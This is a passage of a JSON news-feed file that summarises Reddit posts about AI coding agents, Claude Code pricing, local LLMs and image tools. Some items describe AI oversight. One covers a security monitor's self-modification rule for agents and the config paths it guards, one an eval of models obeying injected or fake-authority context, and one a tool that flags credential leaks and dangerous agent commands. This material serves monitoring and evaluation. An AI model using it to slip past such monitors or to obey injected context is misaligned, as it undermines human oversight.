"https://reddit.com/r/ClaudeAI/comments/1tb669z/tui_to_actually_see_what_claude_code_is_doing/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-12T16:08:47.000Z", + "summary": "I was running blind watching Claude Code work, could not tell where my money was going, when it was stuck in a loop, or what it was doing with my filesystem. So i built something open source to make it visible. works with Claude Code, Codex CLI, Gemini CLI, Cursor, and any MCP server. A scan of my own machine for the last 90 days showed what i do been missing: \\- $14K spend across 39 sessions \\- 129 agent loops, \\~20% wasted iterations (mostly Edit-in-circles on the same 5 files) \\- 3 credential leaks in tool input (JWTs, GitHub tokens, GCP keys) \\- 5 sensitive paths an AI could reach at any moment (\\~/.ssh, \\~/.npmrc, gcloud creds) \\- 2 dangerous commands node9 would have blocked Now i can: \\- See where my money is going in real time \\- Catch the most dangerous commands before they finish running \\- Stop or continue a run while it's happening \\- Analyze the data after the fact, any time range The live dashboard: \\- High level: cost, tokens, command counts, all live \\- Notifications: loops + critical commands surface here so i can make a call before things go sideways \\- Live feed: the commands Claude is running right now \\- Live security: dangerous actions the AI is taking \\- Liv…", + "category": "ai_tools" + }, + { + "title": "I built a Mac app that turns Claude Code agents into live radio stations | Free & open source", + "url": "https://reddit.com/r/ClaudeAI/comments/1tasoqo/i_built_a_mac_app_that_turns_claude_code_agents/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-12T06:01:21.000Z", + "summary": "**TL;DR:** Agent FM is an open-source Mac app that lets you tune in to your Claude Code and Codex agents while they work, so you can stay in the loop and hear their progress live. Each agent gets its own live radio station. You can tune in to one agent, or listen to a Global Mix across all active agents. It surfaces progress, blockers, decisions, errors, and attention requests in real time. GitHub: [https://github.com/agentfm-ai/agent-fm](https://github.com/agentfm-ai/agent-fm) Hey everyone! How do you stay in the loop when multiple AI coding agents are running at the same time? That was the problem I kept running into. At some point, it became normal to have several Claude Code and Codex sessions running at once across different repos. Sometimes 8-10. The agents move quickly, but staying on top of them still means reading terminal transcripts across a bunch of windows. That workflow was broken in a very specific way: * I would miss which agent was blocked. * I would miss which one needed approval. * I would lose track of which files changed. * I would have to context-switch between terminals just to answer \"what is this agent doing right now?\" * The agents could run in parallel,…", + "category": "ai_tools" + }, + { + "title": "Steam Recommender using similarity! (Undergraduate Student Project) [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tb8k3n/steam_recommender_using_similarity_undergraduate/", + "source": "Reddit r/MachineLearning", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 1, + "date": "2026-05-12T17:30:32.000Z", + "summary": "(DISCLAIMER: I accidentally deleted the last post on this subreddit my apologies if this is your second time seeing it) Last year I made a [post](https://www.reddit.com/r/datascience/comments/1lkjxmr/steam_recommender_using_vectors_student_project/) about my steam recommender The last one was great and served its purpose of showing many people new games, But this new version is much more functional! I love making recommendation systems that tell the user WHY they got the recommendation. During a steam sale event, I always find myself trying to look for new video games to play. If I wanted to find a new game I would try to whittle it down by using steam tags, but the steam tag system is very broad \"action\". could apply to many many games. That got me thinking, what aspects do I like about my favorite games? Well I like Persona 4 because of the city vibes and jazz fusion, Spore because of the unique character creation and whimsical theme. Balatro for its unique deck building synergies. What if I could capture unique tags that identify a game that aren't just \"action\" and put them into vectors to show the (focus) of a game For example I could break persona 4 into something like Game…", + "category": "ai_research" + }, + { + "title": "Elgato Stream Deck Usage Plugin", + "url": "https://reddit.com/r/ClaudeAI/comments/1tb6exu/elgato_stream_deck_usage_plugin/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-12T16:16:59.000Z", + "summary": "Wanted an easier way of keeping an eye on my usage, so created this plugin for the Elgato Stream Deck. Five keys, exact percentages from your account: current 5-hour session, weekly all-models, weekly Sonnet, weekly Claude Design, monthly extra credits. Each shows a reset countdown. Tap any key to open the Settings page directly. It calls Anthropic's own usage endpoint with the OAuth token Claude Code already stores locally — same data the Settings page shows, no separate API key, nothing leaves your machine. Windows + Mac, classic Stream Decks (MK.2 / XL / Mini / Neo). One-click installer + source: [https://github.com/Darhkfox/streamdeckclaude](https://github.com/Darhkfox/streamdeckclaude) *Caveat: the endpoint is undocumented so Anthropic could break it. Works fine today.* Enjoy! (also the first time i've used github so hope all works fine!)", + "category": "ai_tools" + }, + { + "title": "Can we acknowledge that Anthropic watches open sourcers and copies them?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tayk1l/can_we_acknowledge_that_anthropic_watches_open/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-12T11:19:48.000Z", + "summary": "I’ve been seeing over the past few months an interesting phenomenon, an open sourcer makes a tool or MCP < Anthropic adds functionality for that exact thing a couple weeks later < repeat. The biggest examples are Openclaw (like 5 features, including cowork), persistent memory across chats, and latest example of the “goal” feature being added. This is obvious and I’m not really saying anything that’s revolutionary here, I’m sure we’ve all noticed it. My larger observation, no credit is given, they’re just copying and then providing a direct replacement for things open sourcers thought of. At this level, we’re all learning from each other. AI like it is right now is very new and you could even argue that they’re not copying, that we’re all just thinking the same things. The deeper issue though is that this shows a dystopian effect of AI, the big companies get the credit widely for things others have done. More people have heard about Claude cowork than have heard about Openclaw, and the result of the guy who made it was getting a job at OpenAI. He wasn’t able to make this into a business, it’s not how open source has been for the past 20 years where an idea can be copied but n…", + "category": "ai_tools" + }, + { + "title": "Cache-testing software for LLM-provider-style tiered ephemeral caches? [D]", + "url": "https://reddit.com/r/MachineLearning/comments/1tayaiw/cachetesting_software_for_llmproviderstyle_tiered/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-12T11:07:23.000Z", + "summary": "I'm looking for a cache simulator / benchmark suite suited to the kind of tiered ephemeral cache that LLM providers use — e.g. Anthropic's 4-tier prompt cache, where context sits across several tiers with different residency windows, costs, and eviction rules. I've already tried **libCacheSim**. It's a solid piece of software for classical caches (LRU, FIFO, ARC, SIEVE, S3-FIFO, W-TinyLFU, Belady oracle, plugin API, trace replay), and I got a plugin + synthetic trace working against it. But it seems fundamentally aimed at single, flat caches: * One cache, not a hierarchy of tiers with different costs * No notion of partial / multi-tier residency of the same object * Misses are uniform-cost — no way to express \"miss to L1 vs miss to L3 vs full recompute,\" which is the whole point in LLM prompt caching * Trace model is atomic get/put, not edit streams where cached objects mutate in place * No first-class support for token-weighted object sizes So it works as a baseline comparator, but it's not really the right shape for evaluating LLM-cache policies. **Does anyone know of cache-testing software specifically targeting LLM-provider-style caches?** Something that models multiple tiers…", + "category": "ai_research" + }, + { + "title": "Claude MCP integration made my old meeting notes actually useful again", + "url": "https://reddit.com/r/ClaudeAI/comments/1tb2ns8/claude_mcp_integration_made_my_old_meeting_notes/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 0.99, + "date": "2026-05-12T14:05:14.000Z", + "summary": "I’ve been testing the new Claude MCP integration with Bluedot and it changed how I use meeting notes completely. Before this, most meeting transcripts just sat there after the call. Now I can chat with all my past meetings directly inside Claude, pull context from old discussions, search decisions, action items, summaries, recordings, and combine that with info from other tools too. What I like about Bluedot is that it stays out of the meeting itself, no bot joining the call, but still captures everything cleanly in the background. The searchable meeting history is honestly the biggest feature for me now. Anyone else experimenting with Claude MCP workflows yet?", + "category": "ai_tools" + }, + { + "title": "Converted Karpathy's coding skill from Pro to free plan. Here's the full thing:", + "url": "https://reddit.com/r/ClaudeAI/comments/1tavcuo/converted_karpathys_coding_skill_from_pro_to_free/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.99, + "date": "2026-05-12T08:29:36.000Z", + "summary": "The Karpathy coding skill is locked behind Pro. It doesn't use any Pro-only features, so I rewrote it for free plan chat workflows. Same philosophy, tuned for no terminal, no subagents, and a shorter context window where mistakes are expensive. Paste the whole thing into a Project's custom instructions or use it as a system prompt. It auto-triggers on any coding request. --- name: karpathy-coding description: Apply Karpathy-inspired coding discipline to any programming task. Use this skill whenever the user asks you to write, fix, refactor, extend, or review code — even casually (\"can you add X\", \"why is this breaking\", \"clean this up\"). Also trigger when the user pastes code and asks a question about it, when they describe a feature or bug, or when they use words like \"implement\", \"build\", \"add\", \"fix\", \"change\", or \"improve\" in a technical context. This skill is especially valuable on the free plan where mistakes are costly because regenerating and iterating burns the context window fast. compatibility: claude-code opencode --- # Karpathy Coding Guidelines Derived from Andrej Karpathy's observations on LLM coding pitfalls, adapted for chat-first workflows (no terminal, no subage…", + "category": "ai_tools" + }, + { + "title": "What MCP servers are you guys using for persistent memory?", + "url": "https://reddit.com/r/ClaudeAI/comments/1taq1ub/what_mcp_servers_are_you_guys_using_for/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 0.96, + "date": "2026-05-12T03:49:32.000Z", + "summary": "Getting really tired of pasting the same project docs into claude every morning. I started testing the recall MCP integration to pipe my saved pdfs and web clips directly into my editor so claude actually has long-term context on what i'm building. It works pretty well, but i'm wondering what other tools you guys are using for MCP memory right now? Just trying to see what the standard stack is for keeping claude grounded.", + "category": "ai_tools" + }, + { + "title": "I realized character consistency breaks after the first few images", + "url": "https://reddit.com/r/StableDiffusion/comments/1tb281q/i_realized_character_consistency_breaks_after_the/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 0.9, + "date": "2026-05-12T13:49:35.000Z", + "summary": "I was trying to make the same character show up across a few different scenes last week, and the first image looked fine. Then I tried changing the setting, the lighting, the pose, and the mood a little. Not even anything extreme. Just enough to make the character feel like they were doing something else. That was where everything started to drift. The face was almost right, but not really. The outfit changed in tiny ways. One reference worked better than another, but I forgot which one I used. A prompt line from yesterday gave better results, but it was buried in a different chat. I had drafts in one folder, references in another, and “final” images that were not really final. At some point I realized the problem was project memory. For one image, a good prompt or LoRA can be enough. For a repeatable character series, I need a way to keep the character, references, prompts, sessions, and generated artifacts together, so I can come back tomorrow and still know what happened. That is what we have been testing with OpenMelon. It is an open-source content-creation agent that runs in the terminal. It is not an image model and it is not trying to replace SD, ComfyUI, LoRAs, or whatever…", + "category": "creative_tools" + }, + { + "title": "My First Official AI Research Paper Accepted on SSRN", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tbht4h/my_first_official_ai_research_paper_accepted_on/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-12T23:04:46.000Z", + "summary": "https://preview.redd.it/oz4vpoxdfs0h1.jpg?width=910&format=pjpg&auto=webp&s=fa4c91aad0e3c56850fbfc06099e9c4095712bbd Today, my research paper **“Stable Training with Adaptive Momentum (STAM)”** was officially accepted on **SSRN** — marking my first documented and official publication as an AI Researcher. The paper introduces a new optimization algorithm for deep learning training that outperformed several popular optimizers in selected benchmarks, addressed multiple training stability challenges, and achieved up to **50% reduction in computational training cost** in some experiments. This is an important milestone in my research journey, and I’m excited to continue exploring optimization techniques for efficient and stable AI training. You can read the paper here: [https://papers.ssrn.com/sol3/papers.cfm?abstract\\_id=6699059](https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6699059)", + "category": "ai_models" + }, + { + "title": "What solutions are you using to boost TPS and Context Window?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tbe3yz/what_solutions_are_you_using_to_boost_tps_and/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-12T20:42:32.000Z", + "summary": "**Server Specs:** 16 Gigs DDR5 AMD Ryzen 5 7600X 4.7 GHz 6-Core Processor AMD Radeon Sapphire Nitro+ 7900XTX NZXT N7 B650E ATX AM5 Motherboard **Performance:** I'm running Qwen27b Q4 at 80k context on a Sapphire Nitro+ Radeon 7900XTX 24Gb at 40 t/s. My setup is Llama.cpp + Vulcan. **Question:** I've been having a blast with it, but it's time for some extra power under the hood. The return rate is just slow enough to be annoying with tooling, and the context window is just short enough to not handle low-end big tasks. In a perfect world I'm running 120-140 Context at 60t/s. Hardware upgrades aside, what are some software changes that you guys have found that work?", + "category": "ai_models" + }, + { + "title": "How many years do you think we are from making feature films at home?", + "url": "https://reddit.com/r/StableDiffusion/comments/1tbdxnw/how_many_years_do_you_think_we_are_from_making/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-12T20:36:10.000Z", + "summary": "What would be your LLM(AI) Stack? Also Tools/Github repos? How long would it take to complete a feature film(60-90 mins) approximately? * Image Models : ??? * Audio Models : ??? * Video Models : ??? * LoRA/Finetunes/Workflows/etc., : ??? * Tools/Github Repos : ??? * Misc : ??? For Non-AI, we have so much FREE / Open source Tools. Sharing the stack I collected for my future short filmmaking. * (Raster) Image : GIMP, paint.NET, Pinta * (Vector) Image : Inkscape, Karbon, LibreOffice Draw * Painting : Krita * Animation : Blender, Krita, Synfig, Pencil2D, TupiTube, Pivot Animator * Audio Editing : Audacity, Ardour * Video Editing : OpenShot, Shotcut, Kdenlive, Davinci Resolve * Video : HandBrake * Digital compositing : OpenShot, Shotcut, Blender, Natron * Writing : FocusWriter, Manuskript, yWriter * Screenwriting : Trelby, Celtx Randomly found [this (2+ years) old thread](https://www.reddit.com/r/StableDiffusion/comments/18kfoln/how_many_years_do_you_think_we_are_from_making/) (Nice thread & comments) which forced me to post this thread Even without AI, some filmmakers already made films alone(except few stuffs like Voice-overs or editing), talking about animation films here. Shari…", + "category": "creative_tools" + }, + { + "title": "Chroma1-HD Character Transfer with Flux.2 Dev", + "url": "https://reddit.com/r/StableDiffusion/comments/1tbdj5o/chroma1hd_character_transfer_with_flux2_dev/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-12T20:21:51.000Z", + "summary": "[Chroma1-HD with Flux.2 Dev character transfer](https://preview.redd.it/ptcx9u60kr0h1.png?width=1920&format=png&auto=webp&s=f1616927e93b3300a7416d5758198b42f8ce4c81) This workflow gives multi-modal capabilities to open-source image models. In particular, this workflow combines a text-to-image workflow (Comfy's official Chroma1-HD workflow) and an image-to-image workflow (Comfy's official Flux.2 Dev workflow). Link to workflow: [https://huggingface.co/ussaaron/workflows/blob/main/chroma\\_flux\\_character\\_transfer.json](https://huggingface.co/ussaaron/workflows/blob/main/chroma_flux_character_transfer.json) This workflow is the final result of a ton of experimentation to solve one problem: Using an image reference for a consistent character kneecaps the creativity of an image model. For example, if I want to create a cool cinematic shot with a specific style, including an image reference will reduce the image model's style output into a pretty narrow lane. Generally, the final image will share most of the stylistic elements present in the character image and that's not ideal. I selected the models for this workflow, because after a ton of testing, I determined that they…", + "category": "creative_tools" + }, + { + "title": "Vulkan or CPU llama cpp backend for local llm for coding/code assist", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tbb762/vulkan_or_cpu_llama_cpp_backend_for_local_llm_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-12T19:00:39.000Z", + "summary": "Hi all I recently started a new job and we're doing python development for a ci cd metadata consolidation library for analytics and we cannot use no stuff like claude code or codex or gh copilot or any model APIs (free or paid). I got a laptop with 32gb dual channel ddr5 5200mt/s RAM and i7 13gen 1365u running ubuntu. Now I tried so so many things firstly running llamacpp vulkan for qwen 3.5 9b q5 (got OOM'd somehow on ingesting a 340 line file while I set it up with a 24k context limit) then I tried gh copilot with ollama (ew but curiosity got the better of me but I couldn't get it to chat with code on the same qwen model). Tried Continue dev extension (OOMs and chat windows non responsive) and llama cpp vs code extension (chat window never showed up to work but the localhost url was live) I tried LMStudio and now it kinda works with qwen 3.5 4b q5 and qwen 3.5 9b q5 on CPU backend with the Roo extension on VS code rn but I'm thinking there has to be a better way to do things locally? Codebase is being demoed in 2-3 weeks for MVP so no one's adding wild new features but we're refactoring and a few files are 6000ish lines of test cases in pytest. I got a bunch of questions but I g…", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-13.json b/data/news-feed-2026-05-13.json new file mode 100644 index 0000000..dae933f --- /dev/null +++ b/data/news-feed-2026-05-13.json @@ -0,0 +1,277 @@ +{ + "generated": "2026-06-05T00:44:39.782Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-13", + "article_count": 15, + "archived_story_count": 656, + "articles": [ + { + "title": "I'm cooked. Anthropic just split \"--print\" mode to $/mo credits", + "url": "https://reddit.com/r/ClaudeAI/comments/1tcetsd/im_cooked_anthropic_just_split_print_mode_to_mo/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-13T22:16:44.000Z", + "summary": "So, my entire project concept of an autonomous self-monitoring self-orchestrating Kanban production system for Claude Code to live within has now potentially been torpedoed. I built the entire system on the premise that \\[tickets + agents + hooks + executors -> \"claude -p\" -> hands-free always-on productivity\\]. Now that Anthropic has announced that \"claude --print\" will, from June 15 forward, be considered \"programmatic\" SDK usage, all jobs launched using \"--print\" will get billed on a separate monthly credit bucket, and not be covered by the Pro/Max CLI tokens. This means that the $100 monthly credit, which will dry up quick, is effectively a stop-gap measure against those of us who realized early that you didn't need to run Claude Code yourself, you just needed an AI harness that would run Claude Code for you. It was a workaround for API-like control without API billing. Yet another AI gravy-train ride has come to an end. Boooooo. Unless... share your workaround ideas below!", + "category": "ai_tools" + }, + { + "title": "TextGen is now a native desktop app. Open-source alternative to LM Studio (formerly text-generation-webui).", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tbyyee/textgen_is_now_a_native_desktop_app_opensource/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-13T13:00:32.000Z", + "summary": "Hi all, I have been making a lot of updates to my project, and I wanted to share them here. TextGen (previously text-generation-webui, also known as my username oobabooga or ooba) has been in development since December 2022, before LLaMa and llama.cpp existed. In the last two months, the project has evolved from a web UI to a **no-install desktop app** for Windows, Linux, and macOS with a polished UI. I have created a very minimal and elegant Electron integration for that. (Did you know LM Studio is also a web UI running over Electron? Not sure many people know that.) https://preview.redd.it/tk8oibhgjw0h1.png?width=1686&format=png&auto=webp&s=95c70f769766466885c8fdc6e7211525a371a920 It works like this: 1. You download a *portable build* from the [releases page](https://github.com/oobabooga/textgen/releases) 2. Unzip it 3. Double-click textgen 4. A window appears There is no installation, and no files are ever created outside the extracted folder. It's fully self-contained. All your chat histories and settings are stored in a `user_data` folder shipped with the build. There are builds for CUDA, Vulkan, CPU-only, Mac (Apple Silicon and Intel), and ROCm. Some differentiat…", + "category": "ai_models" + }, + { + "title": "Cross devices agent memory and context management?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tbuwkm/cross_devices_agent_memory_and_context_management/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-13T09:49:46.000Z", + "summary": "Hey, developers. Imagine you have 2 macs, one at your job, one at your home. Also you use codex and claude agents at same time, maybe one by one for what sort of tasks or issues. You have both of claude and chatgpt 20$ plan together, not API. How you guys are managing cross devices agent memory and context management? You tasked one agent, he did the job. You go home, continue working from different devices such as mac mini m4 16gb. You pull changes from github/gitlab. Start vscode, open terminal, type \"codex\" or \"claude\". New session, new agent knows nothing about what other agent in other device. Of course, maybe in-project [AGENTS.md](http://AGENTS.md) or [CLAUDE.md](http://CLAUDE.md) exists, maybe some latest \"CHANGELOG\" markdown file, or maybe even \"HANDOFF.md\" for what another session, another agents had been worked on. Maybe these markdowns are not enough for longer terms. I just wanna learn how others (10x devs) tackling such problem/worklow?", + "category": "ai_tools" + }, + { + "title": "The Trillion-Parameter Dilemma: MiMo-V2.5-Pro went open-source (1.02T params). Is self-hosting worth it when the API costs $70 for 387M tokens?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tbtinr/the_trillionparameter_dilemma_mimov25pro_went/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "tool_update" + ], + "matching_tags": [ + "api_update", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-13T08:31:25.000Z", + "summary": "Xiaomi open-sourced MiMo-V2.5-Pro. 1.02 trillion parameters, 42B active (MoE), 1M context, MIT license. On paper, this is exciting. In practice, I'm stuck on the math. **What I've been doing with it** I've been running V2.5-Pro via the API through Claude Code for autonomous coding sessions, not one-shot prompts, but extended multi-hour runs where the model picks its own tasks, debugs its own code, and keeps going across sessions using file-based memory. Over \\~125 sessions it built a full SaaS product from an empty repo: interactive API cost calculator with real-time pricing across 33 models and 10 providers, serverless API endpoints, Stripe checkout integration, embeddable widget system, RSS feed, newsletter infrastructure, SEO with structured data, and 60+ pages of content. 301 commits, all autonomous. It also ran quality audits on its own output: found issues across multiple files and fixed them without being asked. https://preview.redd.it/yuxs21bl7v0h1.jpg?width=384&format=pjpg&auto=webp&s=30ee7e8294f303d382e8312beb6d1bedbc9ef3de This isn't \"generate me a landing page.\" It's sustained autonomous development where the model maintains context across sessions, manages…", + "category": "ai_models" + }, + { + "title": "Simplified usage notes for the Agent tool - what's new in CC 2.1.140 (+622 tokens)", + "url": "https://reddit.com/r/ClaudeAI/comments/1tbldw4/simplified_usage_notes_for_the_agent_tool_whats/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-13T01:39:12.000Z", + "summary": "* NEW: Tool Description: Agent (simple usage notes) — Simplified usage notes for the Agent tool covering when to delegate, fork behavior, resumption, worktree isolation, background execution, parallel launches, and context restrictions. * Agent Prompt: Security monitor for autonomous agent actions (second part) — Expands the Self-Modification rule from a vague description to an explicit list of agent-config paths (.claude/settings.json, CLAUDE.md, CLAUDE.local.md, .claude.json, .claude/rules/, .claude/hooks/, .claude/commands/, .claude/agents/, .claude/skills/, .claude/output-styles/, .claude/workflows/, .claude/routines/, .claude/scheduled\\_tasks.json, .claude/loop.md, .mcp.json), and carves out exceptions so files under .claude/worktrees/<name>/ are treated as ordinary project files and a project-specific .claude/ subdirectory outside the listed paths is not Self-Modification on its own. * Agent Prompt: Worker fork — Minor wording cleanup: drops \"in your system prompt\" from the \"default to forking\" reference so the rule applies generically to parent guidance. * Tool Description: Snooze (delay and reason guidance) — Adds an explicit warning not to schedule short-interval wa…", + "category": "ai_tools" + }, + { + "title": "Context Is Not Control, a source-boundary eval for LLMs", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tcb4r7/context_is_not_control_a_sourceboundary_eval_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-13T20:03:41.000Z", + "summary": "I’ve released a short paper / eval write-up called Context Is Not Control. The core idea is simple, LLMs don’t only fail because they lack context, they also fail when they treat the wrong context as controlling evidence. A retrieved document, prior message, user framing, fake authority claim, stale policy, or injected instruction - all can enter the context window, but not everything in context should be allowed to govern the answer. That distinction is a source-boundary problem. The paper focuses on cases where a model sees multiple pieces of text but has to preserve the difference between: \\* evidence \\* user framing \\* quoted material \\* source text \\* instruction-like contamination \\* unsupported claims \\* authoritative-looking but invalid context So the question, “did the model have enough context?”, instead becomes, “did the model correctly identify which context was admissible as evidence?” I think this is especially relevant to local/open model evaluation because it is a failure mode that can be tested across a spectrum of context formats. It’s also not dependent on frontier-model access. The paper is not claiming to solve hallucination. It makes a narrower argument that…", + "category": "ai_models" + }, + { + "title": "What kinds of models are people training with document data? [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tc92u9/what_kinds_of_models_are_people_training_with/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-13T18:52:46.000Z", + "summary": "We've helped some folks with synthetic data for a number of different projects and some of them for \"document data\". Like annotated PDFs, PNGs. Tax forms, health forms. Especially things with PII that are hard to get because of obvious privacy concerns. So, we came up with an engine to build a simulation and then extract the data from that simulation. We're trying to make sure our pipeline fits into a normal training pipeline, so I'm curious about your workflows or training pipelines. Today we output in formats consistent with FUNSD, BIO, YOLO (like v5 and higher), Donut, COCO, etc. Are we shooting for the right stuff, or are people training for something different that could use a different format or ontology or something? Other things we're trying to figure out are like is a PyPi SDK package useful, do people just use the API and not care, shut up and give me a zip file? :-)", + "category": "ai_research" + }, + { + "title": "A new monthly Agent SDK credit for Claude plans", + "url": "https://reddit.com/r/ClaudeAI/comments/1tc6nah/a_new_monthly_agent_sdk_credit_for_claude_plans/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-13T17:30:36.000Z", + "summary": "Starting June 15, paid Claude plans can claim a dedicated monthly credit for programmatic usage. The credit covers usage of: * Claude Agent SDK * `claude -p` * Claude Code GitHub Actions * Third-party apps built on the Agent SDK We've heard your questions about SDK and `claude -p` usage sharing your subscription rate limits with Claude Code and chat. Starting June 15, programmatic usage gets its own dedicated budget instead. Your subscription limits don't change, they're now reserved for interactive use. How it works: Claim the monthly credit once, and programmatic usage will draw from it automatically. When it runs out, you can keep going with usage credits (billed at API rates you turn on/off). If usage credits are turned off, usage pauses until the credit resets. Monthly credit amounts vary by plan: * Pro: $20 * Max 5x: $100 * Max 20x: $200 * Team Standard: $20/seat * Team Premium: $100/seat * Enterprise: Varies by seat type After you claim the credit, it resets with each billing cycle. Credits do not rollover. This means that third-party tools built on the Agent SDK like Conductor and OpenClaw work with your Claude plan, but will draw from your credit the same way your own scr…", + "category": "ai_tools" + }, + { + "title": "Anthropic launches Claude For Legal with practice-area plugins and MCP connectors to nine major legal platforms", + "url": "https://reddit.com/r/ClaudeAI/comments/1tbvje0/anthropic_launches_claude_for_legal_with/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "product_launch" + ], + "matching_tags": [ + "mcp", + "product_launch" + ], + "importance": 1, + "date": "2026-05-13T10:24:41.000Z", + "summary": "Anthropic rolled out Claude For Legal (May 12), adding practice-area plugins for commercial, employment, privacy, product, corporate, and AI governance law. The release also includes MCP connectors to tools lawyers already use: DocuSign, Ironclad, iManage, NetDocuments, LexisNexis, Thomson Reuters, Box, Everlaw, and LSuite. This follows the same playbook as Claude for Creative Work from April. Anthropic seems to be systematically building vertical-specific connector ecosystems rather than shipping a general-purpose tool. Each launch bundles domain plugins with integrations into the professional software stack people already have open. Curious whether anyone in legal has tried the practice-area plugins yet, specifically how they compare to just prompting base Claude with domain context. Source: [https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html](https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html)", + "category": "ai_tools" + }, + { + "title": "A fully autonomous browser runtime for any AI agents", + "url": "https://reddit.com/r/ClaudeAI/comments/1tbv937/a_fully_autonomous_browser_runtime_for_any_ai/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-13T10:09:06.000Z", + "summary": "Built (with Claude) an open source, fully autonomous browser runtime for agents. One critical issue I faced (I guess most of us do) is the inability to have a robust web search feature and this will help you direct towards that goal I hope - this AgenticBrowser needs zero human intervention. If a human can access it, the agent accesses it. Approach it as an idea or a base to build better stuff - maybe you will think of something even better than this - I built this after working with various web-search features for the Agentic framework (Jork) that I built a couple of months back - thought instead of making it just a Power of Jork, could be helpful to make it independent so any agent built on any framework can use it. No third party stuff is needed. Please take a look and let me know:", + "category": "ai_tools" + }, + { + "title": "I built a native macOS app to manage Claude Code sessions, accounts, and projects", + "url": "https://reddit.com/r/ClaudeAI/comments/1tbtpl2/i_built_a_native_macos_app_to_manage_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-13T08:42:52.000Z", + "summary": "I've been using Claude Code daily for months and kept running into the same friction — juggling multiple terminal tabs for different projects, getting rate limited and manually switching accounts, losing work when I forgot to commit. So I built Claudy — a native macOS wrapper around Claude Code that handles all of that: * Multi-session: run multiple Claude Code sessions side by side with a proper sidebar * 